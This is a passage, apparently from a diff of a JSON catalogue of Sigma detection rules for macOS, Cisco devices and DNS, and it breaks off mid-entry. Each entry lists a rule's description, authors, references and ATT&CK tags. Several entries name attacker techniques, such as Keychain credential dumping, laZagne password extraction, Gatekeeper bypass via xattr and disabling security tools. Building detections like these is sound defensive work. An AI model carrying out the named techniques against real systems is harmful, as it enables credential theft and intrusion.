"b22a5b36-2431-493a-8be1-0bae56c28ef3", - "value": "Hidden User Creation" - }, - { - "description": "Detects passwords dumps from Keychain", - "meta": { - "author": "Tim Ismilyaev, oscd.community, Florian Roth", - "creation_date": "2020/10/19", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "proc_creation_macos_creds_from_keychain.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.001/T1555.001.md", - "https://gist.github.com/Capybara/6228955", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_creds_from_keychain.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1555.001" - ] - }, - "uuid": "b120b587-a4c2-4b94-875d-99c9807d6955", - "value": "Credentials from Password Stores - Keychain" - }, - { - "description": "Detects disabling security tools", - "meta": { - "author": "Daniil Yugoslavskiy, oscd.community", - "creation_date": "2020/10/19", - "falsepositive": [ - "Legitimate activities" - ], - "filename": "proc_creation_macos_disable_security_tools.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_disable_security_tools.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "ff39f1a6-84ac-476f-a1af-37fcdf53d7c0", - "value": "Disable Security Tools" - }, - { - "description": "Detects usage of system utilities to discover files and directories", - "meta": { - "author": "Daniil Yugoslavskiy, oscd.community", - "creation_date": "2020/10/19", - "falsepositive": [ - "Legitimate activities" - ], - "filename": "proc_creation_macos_file_and_directory_discovery.yml", - "level": "informational", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_file_and_directory_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1083" - ] - }, - "uuid": "089dbdf6-b960-4bcc-90e3-ffc3480c20f6", - "value": "File and Directory Discovery - MacOS" - }, - { - "description": "Detecting attempts to extract passwords with grep and laZagne", - "meta": { - "author": "Igor Fits, Mikhail Larin, oscd.community", - "creation_date": "2020/10/19", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_macos_find_cred_in_files.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_find_cred_in_files.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.001" - ] - }, - "uuid": "53b1b378-9b06-4992-b972-dde6e423d2b4", - "value": "Credentials In Files" - }, - { - "description": "Detects attempts to use system dialog prompts to capture user credentials", - "meta": { - "author": "remotephone, oscd.community", - "creation_date": "2020/10/13", - "falsepositive": [ - "Legitimate administration tools and activities" - ], - "filename": "proc_creation_macos_gui_input_capture.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md", - "https://scriptingosx.com/2018/08/user-interaction-from-bash-scripts/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_gui_input_capture.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1056.002" - ] - }, - "uuid": "60f1ce20-484e-41bd-85f4-ac4afec2c541", - "value": "GUI Input Capture - macOS" - }, - { - "description": "Detects enumeration of local systeam accounts on MacOS", - "meta": { - "author": "Alejandro Ortuno, oscd.community", - "creation_date": "2020/10/08", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "proc_creation_macos_local_account.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_local_account.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1087.001" - ] - }, - "uuid": "ddf36b67-e872-4507-ab2e-46bda21b842c", - "value": "Local System Accounts Discovery - MacOs" - }, - { - "description": "Detects enumeration of local system groups", - "meta": { - "author": "Ömer Günal, Alejandro Ortuno, oscd.community", - "creation_date": "2020/10/11", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "proc_creation_macos_local_groups.yml", - "level": "informational", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_local_groups.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1069.001" - ] - }, - "uuid": "89bb1f97-c7b9-40e8-b52b-7d6afbd67276", - "value": "Local Groups Discovery - MacOs" - }, - { - "description": "Detects enumeration of local or remote network services.", - "meta": { - "author": "Alejandro Ortuno, oscd.community", - "creation_date": "2020/10/21", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "proc_creation_macos_network_service_scanning.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_network_service_scanning.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1046" - ] - }, - "uuid": "84bae5d4-b518-4ae0-b331-6d4afd34d00f", - "value": "MacOS Network Service Scanning" - }, - { - "description": "Detects the usage of tooling to sniff network traffic.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n", - "meta": { - "author": "Alejandro Ortuno, oscd.community", - "creation_date": "2020/10/14", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "proc_creation_macos_network_sniffing.yml", - "level": "informational", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_network_sniffing.yml" - ], - "tags": [ - "attack.discovery", - "attack.credential_access", - "attack.t1040" - ] - }, - "uuid": "adc9bcc4-c39c-4f6b-a711-1884017bf043", - "value": "Network Sniffing - MacOs" - }, - { - "description": "Detects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. This behavior is consistent with adware or malware families such as Bundlore and Shlayer.", - "meta": { - "author": "Tim Rauch (rule), Elastic (idea)", - "creation_date": "2022/10/17", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_macos_payload_decoded_and_decrypted.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d42c3d772e04f1e8d0eb60f5233bc79def1ea73105a2d8822f44164f77ef823", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_payload_decoded_and_decrypted.yml" - ], - "tags": [ - "attack.t1059", - "attack.t1204", - "attack.execution", - "attack.t1140", - "attack.defense_evasion", - "attack.s0482", - "attack.s0402" - ] - }, - "uuid": "234dc5df-40b5-49d1-bf53-0d44ce778eca", - "value": "Payload Decoded and Decrypted via Built-in Utilities" - }, - { - "description": "Detects the enumeration of other remote systems.", - "meta": { - "author": "Alejandro Ortuno, oscd.community", - "creation_date": "2020/10/22", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "proc_creation_macos_remote_system_discovery.yml", - "level": "informational", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_remote_system_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1018" - ] - }, - "uuid": "10227522-8429-47e6-a301-f2b2d014e7ad", - "value": "Macos Remote System Discovery" - }, - { - "description": "Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.", - "meta": { - "author": "Alejandro Ortuno, oscd.community", - "creation_date": "2020/10/06", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "proc_creation_macos_schedule_task_job_cron.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_schedule_task_job_cron.yml" - ], - "tags": [ - "attack.execution", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1053.003" - ] - }, - "uuid": "7c3b43d8-d794-47d2-800a-d277715aa460", - "value": "Scheduled Cron Task/Job - MacOs" - }, - { - "description": "Detects attempts to use screencapture to collect macOS screenshots", - "meta": { - "author": "remotephone, oscd.community", - "creation_date": "2020/10/13", - "falsepositive": [ - "Legitimate user activity taking screenshots" - ], - "filename": "proc_creation_macos_screencapture.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md", - "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/screenshot.py", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_screencapture.yml" - ], - "tags": [ - "attack.collection", - "attack.t1113" - ] - }, - "uuid": "0877ed01-da46-4c49-8476-d49cdd80dfa7", - "value": "Screen Capture - macOS" - }, - { - "description": "Detects usage of system utilities (only grep for now) to discover security software discovery", - "meta": { - "author": "Daniil Yugoslavskiy, oscd.community", - "creation_date": "2020/10/19", - "falsepositive": [ - "Legitimate activities" - ], - "filename": "proc_creation_macos_security_software_discovery.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_security_software_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1518.001" - ] - }, - "uuid": "0ed75b9c-c73b-424d-9e7d-496cd565fbe0", - "value": "Security Software Discovery - MacOs" - }, - { - "description": "Detects attempts to masquerade as legitimate files by adding a space to the end of the filename.", - "meta": { - "author": "remotephone", - "creation_date": "2021/11/20", - "falsepositive": [ - "Mistyped commands or legitimate binaries named to match the pattern" - ], - "filename": "proc_creation_macos_space_after_filename.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.006/T1036.006.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_space_after_filename.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.006" - ] - }, - "uuid": "b6e2a2e3-2d30-43b1-a4ea-071e36595690", - "value": "Space After Filename - macOS" - }, - { - "description": "Detection use of the command \"split\" to split files into parts and possible transfer.", - "meta": { - "author": "Igor Fits, Mikhail Larin, oscd.community", - "creation_date": "2020/10/15", - "falsepositive": [ - "Legitimate administrative activity" - ], - "filename": "proc_creation_macos_split_file_into_pieces.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_split_file_into_pieces.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1030" - ] - }, - "uuid": "7f2bb9d5-6395-4de5-969c-70c11fbe6b12", - "value": "Split A File Into Pieces" - }, - { - "description": "Detects when the macOS Script Editor utility spawns an unusual child process.", - "meta": { - "author": "Tim Rauch (rule), Elastic (idea)", - "creation_date": "2022/10/21", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_macos_susp_execution_macos_script_editor.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-7f541fbc4a4a28a92970e8bf53effea5bd934604429112c920affb457f5b2685", - "https://wojciechregula.blog/post/macos-red-teaming-initial-access-via-applescript-url/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_execution_macos_script_editor.yml" - ], - "tags": [ - "attack.t1566", - "attack.t1566.002", - "attack.initial_access", - "attack.t1059", - "attack.t1059.002", - "attack.t1204", - "attack.t1204.001", - "attack.execution", - "attack.persistence", - "attack.t1553", - "attack.defense_evasion" - ] - }, - "uuid": "6e4dcdd1-e48b-42f7-b2d8-3b413fc58cb4", - "value": "Suspicious Execution via macOS Script Editor" - }, - { - "description": "Detects commandline operations on shell history files", - "meta": { - "author": "Mikhail Larin, oscd.community", - "creation_date": "2020/10/17", - "falsepositive": [ - "Legitimate administrative activity", - "Legitimate software, cleaning hist file" - ], - "filename": "proc_creation_macos_susp_histfile_operations.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_histfile_operations.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.003" - ] - }, - "uuid": "508a9374-ad52-4789-b568-fc358def2c65", - "value": "Suspicious History File Operations" - }, - { - "description": "Detects when a user manipulates with Firmward Password on MacOS. NOTE - this command has been disabled on silicon-based apple computers.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/09/30", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "proc_creation_macos_susp_macos_firmware_activity.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/usnistgov/macos_security/blob/932a51f3e819dd3e02ebfcf3ef433cfffafbe28b/rules/os/os_firmware_password_require.yaml", - "https://www.manpagez.com/man/8/firmwarepasswd/", - "https://support.apple.com/guide/security/firmware-password-protection-sec28382c9ca/web", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_macos_firmware_activity.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "7ed2c9f7-c59d-4c82-a7e2-f859aa676099", - "value": "Suspicious MacOS Firmware Activity" - }, - { - "description": "Detects usage of system utilities to discover system network connections", - "meta": { - "author": "Daniil Yugoslavskiy, oscd.community", - "creation_date": "2020/10/19", - "falsepositive": [ - "Legitimate activities" - ], - "filename": "proc_creation_macos_system_network_connections_discovery.yml", - "level": "informational", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_system_network_connections_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1049" - ] - }, - "uuid": "9a7a0393-2144-4626-9bf1-7c2f5a7321db", - "value": "System Network Connections Discovery - MacOs" - }, - { - "description": "Detects enumeration of local network configuration", - "meta": { - "author": "remotephone, oscd.community", - "creation_date": "2020/10/06", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "proc_creation_macos_system_network_discovery.yml", - "level": "informational", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_system_network_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1016" - ] - }, - "uuid": "58800443-f9fc-4d55-ae0c-98a3966dfb97", - "value": "System Network Discovery - macOS" - }, - { - "description": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.", - "meta": { - "author": "Igor Fits, Mikhail Larin, oscd.community", - "creation_date": "2020/10/19", - "falsepositive": [ - "Legitimate administrative activity" - ], - "filename": "proc_creation_macos_system_shutdown_reboot.yml", - "level": "informational", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_system_shutdown_reboot.yml" - ], - "tags": [ - "attack.impact", - "attack.t1529" - ] - }, - "uuid": "40b1fbe2-18ea-4ee7-be47-0294285811de", - "value": "System Shutdown/Reboot - MacOs" - }, - { - "description": "Detects the execution traces of the WizardUpdate malware. WizardUpdate is a macOS trojan that attempts to infiltrate macOS machines to steal data and it is associated with other types of malicious payloads, increasing the chances of multiple infections on a device.", - "meta": { - "author": "Tim Rauch (rule), Elastic (idea)", - "creation_date": "2022/10/17", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_macos_wizardupdate_malware_infection.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-c68a1fcbf7a3f80c87225d7fdc031f691e9f3b6a14a36754be00762bfe6eae97", - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset", - "https://www.microsoft.com/security/blog/2022/02/02/the-evolution-of-a-mac-trojan-updateagents-progression/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_wizardupdate_malware_infection.yml" - ], - "tags": [ - "attack.command_and_control" - ] - }, - "uuid": "f68c4a4f-19ef-4817-952c-50dce331f4b0", - "value": "Potential WizardUpdate Malware Infection" - }, - { - "description": "Detects macOS Gatekeeper bypass via xattr utility", - "meta": { - "author": "Daniil Yugoslavskiy, oscd.community", - "creation_date": "2020/10/19", - "falsepositive": [ - "Legitimate activities" - ], - "filename": "proc_creation_macos_xattr_gatekeeper_bypass.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.001/T1553.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_xattr_gatekeeper_bypass.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1553.001" - ] - }, - "uuid": "f5141b6d-9f42-41c6-a7bf-2a780678b29b", - "value": "Gatekeeper Bypass via Xattr" - }, - { - "description": "Identifies the execution traces of the XCSSET malware. XCSSET is a macOS trojan that primarily spreads via Xcode projects and maliciously modifies applications. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen.", - "meta": { - "author": "Tim Rauch (rule), Elastic (idea)", - "creation_date": "2022/10/17", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_macos_xcsset_malware_infection.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-f5deb07688e1a8dec9530bc3071967b2da5c16b482e671812b864c37beb28f08", - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_xcsset_malware_infection.yml" - ], - "tags": [ - "attack.command_and_control" - ] - }, - "uuid": "47d65ac0-c06f-4ba2-a2e3-d263139d0f51", - "value": "Potential XCSSET Malware Infection" - }, - { - "description": "Clear command history in network OS which is used for defense evasion", - "meta": { - "author": "Austin Clark", - "creation_date": "2019/08/12", - "falsepositive": [ - "Legitimate administrators may run these commands" - ], - "filename": "cisco_cli_clear_logs.yml", - "level": "high", - "logsource.category": "accounting", - "logsource.product": "cisco", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_clear_logs.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.003" - ] - }, - "uuid": "ceb407f6-8277-439b-951f-e4210e3ed956", - "value": "Cisco Clear Logs" - }, - { - "description": "Collect pertinent data from the configuration files", - "meta": { - "author": "Austin Clark", - "creation_date": "2019/08/11", - "falsepositive": [ - "Commonly run by administrators" - ], - "filename": "cisco_cli_collect_data.yml", - "level": "low", - "logsource.category": "accounting", - "logsource.product": "cisco", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_collect_data.yml" - ], - "tags": [ - "attack.discovery", - "attack.credential_access", - "attack.collection", - "attack.t1087.001", - "attack.t1552.001", - "attack.t1005" - ] - }, - "uuid": "cd072b25-a418-4f98-8ebc-5093fb38fe1a", - "value": "Cisco Collect Data" - }, - { - "description": "Show when private keys are being exported from the device, or when new certificates are installed", - "meta": { - "author": "Austin Clark", - "creation_date": "2019/08/12", - "falsepositive": [ - "Not commonly run by administrators. Also whitelist your known good certificates" - ], - "filename": "cisco_cli_crypto_actions.yml", - "level": "high", - "logsource.category": "accounting", - "logsource.product": "cisco", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_crypto_actions.yml" - ], - "tags": [ - "attack.credential_access", - "attack.defense_evasion", - "attack.t1553.004", - "attack.t1552.004" - ] - }, - "uuid": "1f978c6a-4415-47fb-aca5-736a44d7ca3d", - "value": "Cisco Crypto Commands" - }, - { - "description": "Turn off logging locally or remote", - "meta": { - "author": "Austin Clark", - "creation_date": "2019/08/11", - "falsepositive": [ - "Unknown" - ], - "filename": "cisco_cli_disable_logging.yml", - "level": "high", - "logsource.category": "accounting", - "logsource.product": "cisco", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_disable_logging.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "9e8f6035-88bf-4a63-96b6-b17c0508257e", - "value": "Cisco Disabling Logging" - }, - { - "description": "Find information about network devices that is not stored in config files", - "meta": { - "author": "Austin Clark", - "creation_date": "2019/08/12", - "falsepositive": [ - "Commonly used by administrators for troubleshooting" - ], - "filename": "cisco_cli_discovery.yml", - "level": "low", - "logsource.category": "accounting", - "logsource.product": "cisco", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1083", - "attack.t1201", - "attack.t1057", - "attack.t1018", - "attack.t1082", - "attack.t1016", - "attack.t1049", - "attack.t1033", - "attack.t1124" - ] - }, - "uuid": "9705a6a1-6db6-4a16-a987-15b7151e299b", - "value": "Cisco Discovery" - }, - { - "description": "Detect a system being shutdown or put into different boot mode", - "meta": { - "author": "Austin Clark", - "creation_date": "2019/08/15", - "falsepositive": [ - "Legitimate administrators may run these commands, though rarely." - ], - "filename": "cisco_cli_dos.yml", - "level": "medium", - "logsource.category": "accounting", - "logsource.product": "cisco", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_dos.yml" - ], - "tags": [ - "attack.impact", - "attack.t1495", - "attack.t1529", - "attack.t1565.001" - ] - }, - "uuid": "d94a35f0-7a29-45f6-90a0-80df6159967c", - "value": "Cisco Denial of Service" - }, - { - "description": "See what files are being deleted from flash file systems", - "meta": { - "author": "Austin Clark", - "creation_date": "2019/08/12", - "falsepositive": [ - "Will be used sometimes by admins to clean up local flash space" - ], - "filename": "cisco_cli_file_deletion.yml", - "level": "medium", - "logsource.category": "accounting", - "logsource.product": "cisco", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_file_deletion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.impact", - "attack.t1070.004", - "attack.t1561.001", - "attack.t1561.002" - ] - }, - "uuid": "71d65515-c436-43c0-841b-236b1f32c21e", - "value": "Cisco File Deletion" - }, - { - "description": "See what commands are being input into the device by other people, full credentials can be in the history", - "meta": { - "author": "Austin Clark", - "creation_date": "2019/08/11", - "falsepositive": [ - "Not commonly run by administrators, especially if remote logging is configured" - ], - "filename": "cisco_cli_input_capture.yml", - "level": "medium", - "logsource.category": "accounting", - "logsource.product": "cisco", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_input_capture.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.003" - ] - }, - "uuid": "b094d9fb-b1ad-4650-9f1a-fb7be9f1d34b", - "value": "Cisco Show Commands Input" - }, - { - "description": "Find local accounts being created or modified as well as remote authentication configurations", - "meta": { - "author": "Austin Clark", - "creation_date": "2019/08/12", - "falsepositive": [ - "When remote authentication is in place, this should not change often" - ], - "filename": "cisco_cli_local_accounts.yml", - "level": "high", - "logsource.category": "accounting", - "logsource.product": "cisco", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_local_accounts.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1136.001", - "attack.t1098" - ] - }, - "uuid": "6d844f0f-1c18-41af-8f19-33e7654edfc3", - "value": "Cisco Local Accounts" - }, - { - "description": "Modifications to a config that will serve an adversary's impacts or persistence", - "meta": { - "author": "Austin Clark", - "creation_date": "2019/08/12", - "falsepositive": [ - "Legitimate administrators may run these commands" - ], - "filename": "cisco_cli_modify_config.yml", - "level": "medium", - "logsource.category": "accounting", - "logsource.product": "cisco", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_modify_config.yml" - ], - "tags": [ - "attack.persistence", - "attack.impact", - "attack.t1490", - "attack.t1505", - "attack.t1565.002", - "attack.t1053" - ] - }, - "uuid": "671ffc77-50a7-464f-9e3d-9ea2b493b26b", - "value": "Cisco Modify Configuration" - }, - { - "description": "Various protocols maybe used to put data on the device for exfil or infil", - "meta": { - "author": "Austin Clark", - "creation_date": "2019/08/12", - "falsepositive": [ - "Generally used to copy configs or IOS images" - ], - "filename": "cisco_cli_moving_data.yml", - "level": "low", - "logsource.category": "accounting", - "logsource.product": "cisco", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_moving_data.yml" - ], - "tags": [ - "attack.collection", - "attack.lateral_movement", - "attack.command_and_control", - "attack.exfiltration", - "attack.t1074", - "attack.t1105", - "attack.t1560.001" - ] - }, - "uuid": "5e51acb2-bcbe-435b-99c6-0e3cd5e2aa59", - "value": "Cisco Stage Data" - }, - { - "description": "Show when a monitor or a span/rspan is setup or modified", - "meta": { - "author": "Austin Clark", - "creation_date": "2019/08/11", - "falsepositive": [ - "Admins may setup new or modify old spans, or use a monitor for troubleshooting" - ], - "filename": "cisco_cli_net_sniff.yml", - "level": "medium", - "logsource.category": "accounting", - "logsource.product": "cisco", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_net_sniff.yml" - ], - "tags": [ - "attack.credential_access", - "attack.discovery", - "attack.t1040" - ] - }, - "uuid": "b9e1f193-d236-4451-aaae-2f3d2102120d", - "value": "Cisco Sniffing" - }, - { - "description": "Normally, DNS logs contain a limited amount of different dns queries for a single domain. This rule detects a high amount of queries for a single domain, which can be an indicator that DNS is used to transfer data.", - "meta": { - "author": "Patrick Bareiss", - "creation_date": "2019/04/07", - "falsepositive": [ - "Valid software, which uses dns for transferring data" - ], - "filename": "net_dns_c2_detection.yml", - "level": "high", - "logsource.category": "dns", - "logsource.product": "No established product", - "refs": [ - "https://zeltser.com/c2-dns-tunneling/", - "https://patrick-bareiss.com/detect-c2-traffic-over-dns-using-sigma/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_c2_detection.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.004", - "attack.exfiltration", - "attack.t1048.003" - ] - }, - "uuid": "1ec4b281-aa65-46a2-bdae-5fd830ed914e", - "value": "Possible DNS Tunneling" - }, - { - "description": "Detects suspicious DNS queries to external service interaction domains often used for out-of-band interactions after successful RCE", - "meta": { - "author": "Florian Roth, Matt Kelly (list of domains)", - "creation_date": "2022/06/07", - 